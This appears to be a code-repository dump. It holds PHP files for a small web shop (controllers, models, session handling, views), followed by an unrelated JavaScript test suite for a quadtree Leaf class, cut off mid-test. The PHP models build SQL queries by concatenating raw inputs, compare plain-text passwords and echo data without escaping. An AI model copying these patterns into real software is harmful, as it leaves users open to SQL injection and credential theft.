<div class="input-group-text"><i class="fas fa-lock"></i></div>
</div>
<input type="<PASSWORD>" name="<PASSWORD>" class="form-control" placeholder="<PASSWORD>" required>
</div>
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-lock"></i></div>
</div>
<input type="<PASSWORD>" name="<PASSWORD>2" class="form-control" placeholder="<PASSWORD>" required>
</div>
<div class="form-check my-2 text-center">
<input type="checkbox" class="form-check-input" id="robot" required>
<label class="form-check-label" for="robot">I'm not a robot</label>
</div>
<button type="submit" class="btn btn-primary btn-block">Register</button>
</form>
<div class="text-center mt-3">
<a href="/parduotuve/login">Already have account?</a>
</div>
</div><file_sep>/views/catalog/index.php
<div class="row m-0">
<aside class="col-md-3 border-left border-right mb-1">
<?php include_once 'views/menu_categories.php'; ?>
</aside>
<div class="col-md-9 col-sm-12 row p-0 m-0 d-flex justify-content-start">
<?php if (isset($this->data['categories']) && count($this->data['categories']) > 0) { ?>
<?php foreach ($this->data['categories'] as $key => $category) { ?>
<div class="card col-lg-4 col-md-6 col-sm-12 p-0 my-1">
<a href="/parduotuve/catalog/<?php echo mb_strtolower($category['id']); ?>">
<img src="/parduotuve/img/<?php echo isset($category['image']) ? ('categories/' . $category['image']) : 'no-image.png'; ?>" class="card-img-top p-4" alt="">
</a>
<div class="card-body">
<h5 class="card-title text-center"><a href="/parduotuve/catalog/<?php echo $category['id']; ?>"><?php echo $category['name']; ?></a></h5>
</div>
</div>
<?php } ?>
<?php } else { ?>
<h3 class="mx-auto my-5">There are no catalogs</h3>
<?php } ?>
</div>
</div><file_sep>/views/cart/index.php
<div>
<div class="col-xl-10 col-lg-8 col-md-10 col-sm-12 mx-auto mt-3 mb-5">
<?php if (isset($this->data['errors']) && is_array($this->data['errors'])) { ?>
<?php foreach ($this->data['errors'] as $key => $error) { ?>
<div class="alert alert-danger col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $error; ?>
</div>
<?php } ?>
<?php } elseif (isset($this->data['info']) && is_array($this->data['info'])) {?>
<?php foreach ($this->data['info'] as $key => $info) { ?>
<div class="alert alert-success col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $info; ?>
</div>
<?php } ?>
<?php } ?>
<?php if(isset($this->data['products']) && is_array($this->data['products']) && count($this->data['products']) > 0) { ?>
<h1 class="text-center mt-3">Cart</h1>
<ul class="list-group">
<?php foreach ($this->data['products'] as $key => $product) { ?>
<li class="list-group-item mb-1"><a href="/parduotuve/product/<?php echo $product['id']; ?>"><?php echo $product['name']; ?></a> - $<?php echo $product['price']; ?> x <?php echo $product['amount']; ?> <form action="/parduotuve/cart" method="post" class="d-inline "><button type="submit" class="close" name="cart_remove" value="<?php echo $key; ?>"><span class="text-danger" aria-hidden="true">×</span></button></form></li>
<?php } ?>
</ul>
<div class="mt-2 text-center">
<h4>Total: $<?php echo array_sum(array_map(function ($item) { return $item['price'] * (($item['amount'] > 0) ? $item['amount'] : 1); }, $this->data['products'])); ?></h4>
</div>
<a href="/parduotuve/cart/continue"><button class="btn btn-block btn-primary">Continue</button></a>
<?php } else {?>
<div class="my-5">
<h2 class="text-center">Cart is empty</h2>
</div>
<?php } ?>
</div>
</div><file_sep>/controllers/admin.php
<?php
class Admin extends Controller {
function __construct($args = NULL) {
parent::__construct();
if ($this->session->isLogged() && $this->session->isAdmin()) {
if (isset($args[1])) {
switch ($args[1]) {
default:
$this->view->render('error/index');
break;
}
} else {
$this->view->render('admin/index');
}
} else {
$this->view->render('error/index');
}
}
}
<file_sep>/models/cartModel.php
<?php
class cartModel extends Model {
function __construct() {
parent::__construct();
}
function doesProductExist($product_id) {
$result = mysqli_query($this->db, "SELECT * FROM products WHERE id = '" . $product_id . "' LIMIT 1");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return TRUE;
} else {
return FALSE;
}
} else {
$this->handleError();
}
}
function getProduct($product_id) {
$result = mysqli_query($this->db, "SELECT * FROM products WHERE id = '" . $product_id . "' LIMIT 1");
if ($result) {
return mysqli_fetch_array($result, MYSQLI_ASSOC);
} else {
$this->handleError();
}
}
// Unused
function getUserCart($user_id) {
$result = mysqli_query($this->db, "SELECT products.id, products.name, products.price, user_cart_products.amount FROM user_cart_products LEFT JOIN products ON user_cart_products.product = products.id WHERE user = '" . $user_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return FALSE;
}
} else {
$this->handleError();
}
}
function cartAddProduct($user_id, $product_id, $amount) {
$result = mysqli_query($this->db, "INSERT INTO user_cart_products (user, product, amount) VALUES ('" . $user_id . "', '" . $product_id . "', '" . $amount . "')");
if ($result) {
return TRUE;
} else {
$this->handleError();
}
}
function cartRemoveProduct($user_id, $product_id) {
$result = mysqli_query($this->db, "DELETE FROM user_cart_products WHERE user = '" . $user_id . "' AND product = '" . $product_id . "'");
if ($result) {
return TRUE;
} else {
$this->handleError();
}
}
}
<file_sep>/core/Session.php
<?php
class Session {
function __construct() {
session_start();
if (!isset($_SESSION['user_cart'])) {
$_SESSION['user_cart'] = array();
}
}
function isLogged() {
if (isset($_SESSION['isLogged']) && $_SESSION['isLogged'] === TRUE) {
return TRUE;
} else {
return FALSE;
}
}
function isAdmin() {
if (isset($_SESSION['isAdmin']) && $_SESSION['isAdmin'] === TRUE) {
return TRUE;
} else {
return FALSE;
}
}
function login($user_info) {
if (isset($user_info['id'])) {
$_SESSION['user_info'] = $user_info;
$_SESSION['isLogged'] = TRUE;
if (isset($user_info['admin'])) {
$_SESSION['isAdmin'] = $user_info['admin'] == 1 ? TRUE : FALSE;
} else {
$_SESSION['isAdmin'] = FALSE;
}
}
}
function getUserId() {
return $_SESSION['user_info']['id'];
}
function getUserName() {
return isset($_SESSION['user_info']['username']) ? $_SESSION['user_info']['username'] : '';
}
function getUserEmail() {
return isset($_SESSION['user_info']['email']) ? $_SESSION['user_info']['email'] : '';
}
function getUserRegisterDate() {
return isset($_SESSION['user_info']['register_date']) ? $_SESSION['user_info']['register_date'] : '';
}
function updateUserInfo($user_info) {
$_SESSION['user_info'] = $user_info;
}
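// The shopping cart lives entirely in $_SESSION['user_cart']; each entry is the product row plus an extra 'amount' field.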
function cartAddProduct($product, $amount) {
$product['amount'] = $amount;
array_push($_SESSION['user_cart'], $product);
}
function cartRemoveProduct($id) {
foreach ($_SESSION['user_cart'] as $key => $value) {
if ($key == $id) {
unset($_SESSION['user_cart'][$key]);
return TRUE;
}
}
return FALSE;
}
function getUserCart() {
return $_SESSION['user_cart'];
}
function logout() {
$_SESSION['isLogged'] = FALSE;
}
}
<file_sep>/models/profileModel.php
<?php
class profileModel extends Model {
function __construct() {
parent::__construct();
}
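// Note: passwords are stored and compared as plain text by these queries; any hashing is assumed to happen elsewhere.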
function updateUserInfo($user_id, $email) {
$result = mysqli_query($this->db, "UPDATE users SET email = '" . $email . "' WHERE id = '" . $user_id . "'");
if ($result) {
return TRUE;
} else {
return mysqli_error($this->db);
}
}
function updateUserPassword($user_id, $password) {
$result = mysqli_query($this->db, "UPDATE users SET password = '" . $password . "' WHERE id = '" . $user_id . "'");
if ($result) {
return TRUE;
} else {
return mysqli_error($this->db);
}
}
function isPasswordCorrect($user_id, $password) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE id = '" . $user_id . "' AND password = '" . $password . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return TRUE;
} else {
return FALSE;
}
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/views/blog/post.php
<h1 class="text-center py-2">Post</h1>
<div class="position-relative col-xl-5 col-lg-6 col-md-8 col-sm-11 mx-auto pb-4 mb-5 shadow">
<form action="/parduotuve/blog/post/<?php echo isset($this->data['forum_id']) ? $this->data['forum_id'] : ''; ?>" method="post">
<div class="form-group mt-3">
<input type="text" name="post_name" class="form-control" placeholder="Name" required>
</div>
<div class="form-group">
<textarea name="post_content" class="form-control" placeholder="Message" required></textarea>
</div>
<div class="form-group text-center pb-1">
<button class="btn btn-sm btn-primary position-absolute forum-post">Post →</button>
</div>
</form>
<a href="/parduotuve/blog/<?php echo isset($this->data['forum_id']) ? $this->data['forum_id'] : ''; ?>" class="position-absolute m-1 forum-back"><button type="button" class="btn btn-sm btn-dark">← Back</button></a>
</div><file_sep>/controllers/catalog.php
<?php
class Catalog extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
$this->view->addData("products", $this->model->getProducts($args[1]));
$this->view->render('catalog/products');
} else {
$this->view->addData("categories", $this->model->getCategories());
$this->view->render('catalog/index');
}
}
}
<file_sep>/core/core.php
<?php
class Core {
// Default controller
protected $controller = 'index';
function __construct() {
// Preparing URL
$url = $this->parseUrl();
// Checking if URL supplied
if ($url) {
// Checking if controller file exists
if (file_exists('controllers/' . $url[0] . '.php')) {
// Setting current controller to requested
$this->controller = $url[0];
//unset($url[0]); // REMOVE ?
} else {
$this->controller = 'errno';
}
}
// Including controller class file
require_once 'controllers/' . $this->controller . '.php';
// Checking if controller class exists
if (class_exists($this->controller)) {
// Instantiating new controller class
$this->controller = new $this->controller($url);
} else {
print 'GG: Controller class - ' . $this->controller . ', not found!';
}
}
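// Splits the sanitized 'url' GET parameter into segments, e.g. 'catalog/3' -> ['catalog', '3'] (the parameter is presumably filled in by a rewrite rule).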
function parseUrl() {
if (filter_has_var(INPUT_GET, 'url')) {
return explode('/', filter_var(rtrim($_GET['url'], '/'), FILTER_SANITIZE_STRING));
}
}
}
<file_sep>/core/view.php
<?php
class View {
protected $session;
protected $page;
private $data;
function __construct($session) {
$this->session = $session;
}
public function addData($key, $data) {
$this->data[$key] = $data;
}
public function render($name, $data = NULL) {
$this->page = explode("/", $name)[0];
require_once './views/head.php';
require_once './views/' . $name . '.php';
require_once './views/foot.php';
}
}
<file_sep>/views/head.php
<!DOCTYPE html>
<html lang="en">
<head>
<!-- Defaults -->
<meta charset="UTF-8">
<title>Shop</title>
<meta name="description" content="...">
<meta name="author" content="<NAME>">
<link rel="icon" href="/parduotuve/img/favicon.ico">
<!-- Mobile -->
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- CSS -->
<link href="https://fonts.googleapis.com/css?family=Baloo+Chettan" rel="stylesheet">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="<KEY>" crossorigin="anonymous">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css" integrity="<KEY>" crossorigin="anonymous">
<link rel="stylesheet" href="/parduotuve/style.css">
</head>
<body>
<div class="container p-0">
<!-- Header BEGIN -->
<header class="shadow">
<div class="header-top">
<nav class="navbar navbar-expand-lg navbar-dark">
<a class="navbar-brand" href="#">LOGO</a>
<div class="ml-auto">
<?php if ($this->session->isLogged()) { ?>
<?php echo $this->session->isAdmin() ? '<a href="/parduotuve/admin"><button type="button" class="btn btn-light"><i class="fas fa-user-shield"></i> Admin</button></a>' : ''; ?>
<a href="/parduotuve/profile"><button type="button" class="btn btn-light"><i class="fas fa-user"></i> Profile</button></a>
<a href="/parduotuve/logout"><button type="button" class="btn btn-light"><i class="fas fa-sign-out-alt"></i> Logout</button></a>
<?php } else { ?>
<a href="/parduotuve/login"><button type="button" class="btn btn-light"><i class="fas fa-sign-in-alt"></i> Login</button></a>
<a href="/parduotuve/register"><button type="button" class="btn btn-light"><i class="fas fa-user-plus"></i> Register</button></a>
<?php } ?>
</div>
</nav>
</div>
<div class="header-middle">
<div id="header" class="carousel slide" data-ride="carousel">
<ol class="carousel-indicators">
<li data-target="#header" data-slide-to="0" class="active"></li>
<li data-target="#header" data-slide-to="1"></li>
<li data-target="#header" data-slide-to="2"></li>
</ol>
<div class="carousel-inner">
<div class="carousel-item active">
<img src="/parduotuve/img/header1.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h5 class="text-shadow-1">Model S | Tesla</h5>
</div>
</div>
<div class="carousel-item">
<img src="/parduotuve/img/header2.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h5>-75% off!</h5>
</div>
</div>
<div class="carousel-item">
<img src="/parduotuve/img/header3.jpg" class="d-block w-100" alt="...">
<div class="carousel-caption d-none d-md-block">
<h5>...</h5>
<p>...</p>
</div>
</div>
</div>
<a class="carousel-control-prev" href="#header" role="button" data-slide="prev">
<span class="carousel-control-prev-icon" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="carousel-control-next" href="#header" role="button" data-slide="next">
<span class="carousel-control-next-icon" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
</div>
</div>
<div class="header-bottom my-2">
<ul class="nav nav-tabs">
<?php $menu = array("Home" => "", "Catalog" => isset($this->data['categories']) ? $this->data['categories'] : array(), "Blog" => "blog", "About" => "about"); ?>
<?php foreach ($menu as $key => $value) { ?>
<?php if(is_array($menu[$key])) { ?>
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" data-toggle="dropdown" href="#" role="button" aria-haspopup="true" aria-expanded="false"><?php echo $key ?></a>
<div class="dropdown-menu">
<?php foreach ($menu[$key] as $subkey => $submenu) { ?>
<a class="dropdown-item" href="/parduotuve/<?php echo strtolower($key) . "/" . $submenu['id']; ?>"><?php echo $submenu["name"]; ?></a>
<?php } ?>
<div class="dropdown-divider"></div>
<a class="dropdown-item" href="/parduotuve/<?php echo strtolower($key); ?>"><?php echo $key;?></a>
</div>
</li>
<?php } else { ?>
<li class="nav-item">
<a class="nav-link<?php echo $this->page == $value ? " active" : ""; ?>" href="/parduotuve/<?php echo $value; ?>"><?php echo $key; ?></a>
</li>
<?php } ?>
<?php } ?>
<div class="ml-auto mx-3 d-flex">
<a href="/parduotuve/cart" class="m-auto"><i class="fas fa-shopping-cart">Cart (<?php echo is_array($this->session->getUserCart()) ? count($this->session->getUserCart()) : '0'; ?>)</i></a>
</div>
</ul>
</div>
</header>
<!-- Header END -->
<!-- Main BEGIN -->
<main class="container p-0">
|
3b055e5f3afa179cfe4f55b7ff80306b92624abd
|
[
"SQL",
"Text",
"PHP"
] | 39
|
PHP
|
Icybrew/Parduotuve
|
55c9d21f2215ce45071626c8160c21944385400a
|
e3c13118c80b28470acddadecc729a96ab90d6df
|
refs/heads/master
|
<file_sep>import { Component, OnInit } from "@angular/core";
import { HttpErrorResponse } from "@angular/common/http";
import { studentCService } from "../services/student.service";
import { FormGroup, FormBuilder, FormControl} from "@angular/forms";
import { Validators} from "@angular/forms";
@Component({
selector:"student",
templateUrl:"student.component.html"
})
export class studentComponent implements OnInit{
private result:any;
private studentSubscribe:any;
userData:FormGroup;
constructor(private _service:studentCService, private _formBuilder:FormBuilder){}
ngOnInit(){
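// Build the reactive form: studentId starts empty and required, studentName is pre-filled with a default value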
this.userData=this._formBuilder.group({
studentId:[null,[Validators.required]],
studentName:['madhurajuBujji',[Validators.required]]
})
}
public register():any{
console.log(this.userData)
this.studentSubscribe=this._service.postEmp(this.userData.value).subscribe(this._successCallBack, this._errorCallBack);
};
public _successCallBack=(res):any=>{
this.result=res;
};
public _errorCallBack=(err:HttpErrorResponse):any=>{
if(err.error instanceof Error){
console.log("client side errors");
}else{
console.log("server side errors.....!!");
}
};
};<file_sep>import { Injectable } from "@angular/core";
import { HttpClient } from "@angular/common/http";
@Injectable()
export class studentCService{
constructor(private _http:HttpClient){};
public postEmp(studentData:any):any{
return this._http.post("http://localhost:8080/addStudentDetails/student",studentData);
};
};
|
6cfa66c839d4e374bbb643aaec8c53e047814e12
|
[
"TypeScript"
] | 2
|
TypeScript
|
mailforrajus/AngularHttpPost
|
4b1c7b72c5fcba93bc42b4a251304f2f4f20728c
|
fbc90647335ef8b5e81021140ff0dcb49425508b
|
refs/heads/master
|
<repo_name>DanielW1987/sfg-pet-clinic<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/services/jpa/VetJpaService.java
package guru.springframework.sfgpetclinic.services.jpa;
import guru.springframework.sfgpetclinic.model.Vet;
import guru.springframework.sfgpetclinic.repositories.VetRepository;
import guru.springframework.sfgpetclinic.services.VetService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Service;
import java.util.Optional;
@Service
@Profile("spring-data-jpa")
public class VetJpaService implements VetService {
private final VetRepository vetRepository;
@Autowired
public VetJpaService(VetRepository vetRepository) {
this.vetRepository = vetRepository;
}
@Override
public long count() {
return vetRepository.count();
}
@Override
public Optional<Vet> findById(Long id) {
return vetRepository.findById(id);
}
@Override
public Vet save(Vet vet) {
return vetRepository.save(vet);
}
@Override
public Iterable<Vet> findAll() {
return vetRepository.findAll();
}
@Override
public void delete(Vet vet) {
vetRepository.delete(vet);
}
@Override
public void deleteById(Long id) {
vetRepository.deleteById(id);
}
}
<file_sep>/pet-clinic-data/src/test/java/guru/springframework/sfgpetclinic/services/map/OwnerMapServiceTest.java
package guru.springframework.sfgpetclinic.services.map;
import guru.springframework.sfgpetclinic.model.Owner;
import guru.springframework.sfgpetclinic.services.OwnerService;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import java.util.Iterator;
import java.util.Optional;
import static org.junit.jupiter.api.Assertions.*;
/**
* User: DanielW
* Date: 19.08.2019
* Time: 07:39
*/
class OwnerMapServiceTest {
private OwnerService ownerService;
private final String lastName = "Smith";
private final Long ownerId = 1L;
@BeforeEach
void setup() {
ownerService = new OwnerMapService(new PetTypeMapService(), new PetMapService());
ownerService.save(Owner.builder().id(ownerId).lastName(lastName).build());
}
@Test
void findAll() {
Iterable<Owner> owners = ownerService.findAll();
Iterator<Owner> iterator = owners.iterator();
Owner owner = iterator.next();
assertFalse(iterator.hasNext());
assertEquals(ownerId, owner.getId());
}
@Test
void findById() {
Optional<Owner> owner = ownerService.findById(ownerId);
assertTrue(owner.isPresent());
assertEquals(ownerId, owner.get().getId());
}
@Test
void findByLastName() {
Optional<Owner> smith = ownerService.findByLastName(lastName);
assertTrue(smith.isPresent());
assertEquals(ownerId, smith.get().getId());
}
@Test
void findByLastNameNotFound() {
Optional<Owner> optionalOwner = ownerService.findByLastName("Foo");
assertTrue(optionalOwner.isEmpty());
}
@Test
void saveWithExistingId() {
Long newId = 2L;
Owner owner2 = Owner.builder().id(newId).build();
Owner savedOwner = ownerService.save(owner2);
assertEquals(newId, savedOwner.getId());
}
@Test
void saveWithoutId() {
Owner owner2 = Owner.builder().build();
Owner savedOwner = ownerService.save(owner2);
assertNotNull(savedOwner);
assertNotNull(savedOwner.getId());
}
@Test
void delete() {
ownerService.delete(ownerService.findById(ownerId).get());
assertEquals(0, ownerService.count());
}
@Test
void deleteById() {
ownerService.deleteById(ownerId);
assertEquals(0, ownerService.count());
}
}
<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/services/map/OwnerMapService.java
package guru.springframework.sfgpetclinic.services.map;
import guru.springframework.sfgpetclinic.model.Owner;
import guru.springframework.sfgpetclinic.model.Pet;
import guru.springframework.sfgpetclinic.services.OwnerService;
import guru.springframework.sfgpetclinic.services.PetService;
import guru.springframework.sfgpetclinic.services.PetTypeService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.lang.NonNull;
import org.springframework.stereotype.Service;
import java.util.Optional;
import java.util.Set;
@Service
@Profile({"default", "map"})
public class OwnerMapService extends AbstractMapService<Owner, Long> implements OwnerService {
private final PetTypeService petTypeService;
private final PetService petService;
@Autowired
public OwnerMapService(PetTypeService petTypeService, PetService petService) {
this.petTypeService = petTypeService;
this.petService = petService;
}
@Override
public Optional<Owner> findByLastName(String lastName) {
for (var owner : findAll()) {
if (owner.getLastName().equalsIgnoreCase(lastName)) {
return Optional.of(owner);
}
}
return Optional.empty();
}
@Override
public Owner save(@NonNull Owner owner) {
Set<Pet> pets = owner.getPets();
if (pets != null && ! pets.isEmpty()) {
savePet(pets);
savePetType(pets);
}
return super.save(owner);
}
private void savePet(Set<Pet> pets) {
pets.forEach(pet -> {
if (pet.isNew()) {
petService.save(pet);
}
});
}
private void savePetType(Set<Pet> pets) {
for (Pet pet : pets) {
if (pet.getPetType() != null && pet.getPetType().isNew()) {
petTypeService.save(pet.getPetType());
}
}
}
}
<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/services/jpa/OwnerJpaService.java
package guru.springframework.sfgpetclinic.services.jpa;
import guru.springframework.sfgpetclinic.model.Owner;
import guru.springframework.sfgpetclinic.repositories.OwnerRepository;
import guru.springframework.sfgpetclinic.services.OwnerService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Profile;
import org.springframework.stereotype.Service;
import java.util.Optional;
@Service
@Profile("spring-data-jpa")
public class OwnerJpaService implements OwnerService {
private final OwnerRepository ownerRepository;
@Autowired
public OwnerJpaService(OwnerRepository ownerRepository) {
this.ownerRepository = ownerRepository;
}
@Override
public long count() {
return ownerRepository.count();
}
@Override
public Optional<Owner> findByLastName(String lastName) {
return ownerRepository.findByLastName(lastName);
}
@Override
public Optional<Owner> findById(Long id) {
return ownerRepository.findById(id);
}
@Override
public Owner save(Owner owner) {
return ownerRepository.save(owner);
}
@Override
public Iterable<Owner> findAll() {
return ownerRepository.findAll();
}
@Override
public void delete(Owner owner) {
ownerRepository.delete(owner);
}
@Override
public void deleteById(Long id) {
ownerRepository.deleteById(id);
}
}
<file_sep>/pet-clinic-data/src/main/java/guru/springframework/sfgpetclinic/model/Pet.java
package guru.springframework.sfgpetclinic.model;
import lombok.AllArgsConstructor;
import lombok.Builder;
import lombok.Data;
import lombok.EqualsAndHashCode;
import javax.persistence.*;
import java.time.LocalDate;
import java.util.HashSet;
import java.util.Set;
@Entity
@Table(name = "pets")
@Data
@Builder
@AllArgsConstructor
@EqualsAndHashCode(callSuper = true, exclude = "owner")
public class Pet extends BaseEntity {
@Column(name = "name")
private String name;
@ManyToOne
@JoinColumn(name = "type_id")
private PetType petType;
@ManyToOne
@JoinColumn(name = "owner_id")
private Owner owner;
@Column(name = "birth_date")
private LocalDate birthDate;
@OneToMany(cascade = CascadeType.ALL, mappedBy = "pet")
private Set<Visit> visits;
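// Note: Lombok's @Builder goes through the all-args constructor, so builder-created pets keep visits = null unless it is set explicitly (or @Builder.Default is added).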
public Pet() {
visits = new HashSet<>();
}
public void addVisit(Visit visit) {
visits.add(visit);
}
}
|
3edea766b5a40cc9dd3eb7be32a4582c76259f9c
|
[
"Java"
] | 5
|
Java
|
DanielW1987/sfg-pet-clinic
|
2af11a7d4f56758d61e150394495b726b0d2b2e5
|
cc6bc095b29e1351f984c76c602e2a342c417a2f
|
refs/heads/master
|
<repo_name>F1LT3R/carlton-quadtree<file_sep>/leaf-tests.js
var test = require('./test-runner.js');
var describe = test.describe;
var expect = test.expect;
var run = test.run;
var props = {
bounds: {
top: 0,
left: 0,
bottom: 1.001,
right: 1.001,
}
};
var Leaf = require('./Leaf.js');
describe('Leaf should require definition properties', function () {
var leaf = new Leaf();
expect(leaf.valid).toBe(false);
var leaf = new Leaf({});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({ bounds: null });
expect(leaf.valid).toBe(false);
});
describe('Leaf should be undefined if no bounds dimensions are passed', function () {
var leaf = new Leaf({
bounds: {
// top: 0,
left: 0,
bottom: 1,
right: 1,
}
});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({
bounds: {
top: 0,
// left: 0,
bottom: 1,
right: 1,
}
});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({
bounds: {
top: 0,
left: 0,
// bottom: 1,
right: 1,
}
});
expect(leaf.valid).toBe(false);
var leaf = new Leaf({
bounds: {
top: 0,
left: 0,
bottom: 1,
// right: 1,
}
});
expect(leaf.valid).toBe(false);
});
describe('Leaf should instantiate if bounds have top, left, bottom, right dimensions', function () {
var leaf = new Leaf({
bounds: {
top: 0,
left: 0,
bottom: 1,
right: 1,
}
});
expect(typeof leaf).toBe('object');
expect(typeof leaf.bounds).toBe('object');
expect(typeof leaf.bounds.top).toBe('number');
expect(typeof leaf.bounds.left).toBe('number');
expect(typeof leaf.bounds.bottom).toBe('number');
expect(typeof leaf.bounds.right).toBe('number');
});
describe('New leaf should have no items and no leaves', function () {
var leaf = new Leaf(props);
expect(leaf.items.length).toBe(0);
expect(leaf.leaves.length).toBe(0);
});
describe('Adding an item should fail x, y, val/objectReference', function () {
var leaf = new Leaf(props);
leaf.addItem({});
expect(leaf.items.length).toBe(0);
var leaf = new Leaf(props);
leaf.addItem({
// x: 0,
y: 0,
val: 'A',
});
expect(leaf.items.length).toBe(0);
var leaf = new Leaf(props);
leaf.addItem({
x: 0,
// y: 0,
val: 'A',
});
expect(leaf.items.length).toBe(0);
var leaf = new Leaf(props);
leaf.addItem({
x: 0,
y: 0,
// val: 'A',
});
expect(leaf.items.length).toBe(0);
});
describe('Leaf should have 1 item after adding first item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
expect(leaf.items.length).toBe(1);
});
describe('Leaf should have 2 items after adding second item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
expect(leaf.items.length).toBe(2);
});
describe('Leaf should have 3 items after adding third item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
expect(leaf.items.length).toBe(3);
});
describe('Leaf should have 4 items after adding forth item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
expect(leaf.items.length).toBe(4);
});
describe('getItems should return 4 and 5 items respectively', function () {
var leaf = new Leaf(props);
// Add 4 items
for (var i=0; i< 4; i++) {
leaf.addItem({
x: Math.random(),
y: Math.random(),
val: i
});
}
// Check we have 4 items
expect(typeof leaf).toBe('object');
expect(leaf.getItems().length).toBe(4)
// Add one more item
leaf.addItem({
x: Math.random(),
y: Math.random(),
val: i
});
// check we have 5 items
expect(leaf.getItems().length).toBe(5)
});
describe('Leaf should count 16,384 items after adding 16,384 items', function () {
var leaf = new Leaf(props);
for (var i=0; i< 16384; i++) {
leaf.addItem({
x: Math.random(), // random from 0-1
y: Math.random(), // random from 0-1
val: i
});
}
expect(typeof leaf).toBe('object');
expect(leaf.getItems().length).toBe(16384)
}, 400);
describe('Item should have reference to leaf', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
var item = leaf.items[0];
expect(typeof item.leaf).toBe('object');
// Should see its own reflection
console.log(item);
expect(item.leaf.items.length).toBe(1);
});
describe('Item\'s leaf reference should change when its leaf changes', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
var item = leaf.leaves[0].items[0];
expect(typeof item.leaf).toBe('object');
// There shouldbe two items on this leaf
expect(item.leaf.items.length).toBe(2);
// The item itself should have no id
expect(typeof item.id).toBe('undefined');
// Check that the IDs on this leaf are the same
expect(item.leaf.id).toEqual(item.leaf.items[0].leaf.id);
expect(item.leaf.id).toEqual(item.leaf.items[1].leaf.id);
});
describe('getUnEmptyLeaves should return 1 leaf containing all 4 items', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
var unEmptyLeaves = leaf.getUnEmptyLeaves();
expect(unEmptyLeaves.length).toEqual(1);
// Expect the only unempty leaf to have 4 items
expect(unEmptyLeaves[0].items.length).toBe(4);
});
describe('getUnEmptyLeaves should return 4 leaves, each containing > 0 items', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
var unEmptyLeaves = leaf.getUnEmptyLeaves();
expect(unEmptyLeaves.length).toEqual(4);
// Expect all the leaves to have more than 0 items
unEmptyLeaves.forEach(function (subleaf) {
expect(subleaf.items.length).toBeGreaterThan(0);
});
});
describe('unEmptyLeaves.items length should match getItems.length', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
leaf.addItem({ x: 0.126, y: 0.126, val: 'F' });
leaf.addItem({ x: 0.127, y: 0.127, val: 'G' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'H' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'I' });
leaf.addItem({ x: 0.1252, y: 0.1253, val: 'J' });
leaf.addItem({ x: 0.12511, y: 0.12511, val: 'K' });
leaf.addItem({ x: 0.12512, y: 0.12512, val: 'L' });
leaf.addItem({ x: 0.12513, y: 0.12513, val: 'M' });
var unEmptyLeaves = leaf.getUnEmptyLeaves();
// We should have 7 unempty leaves with the above setup
expect(unEmptyLeaves.length).toBe(7);
var allItems = leaf.getItems();
// We should have 13 items in the tree
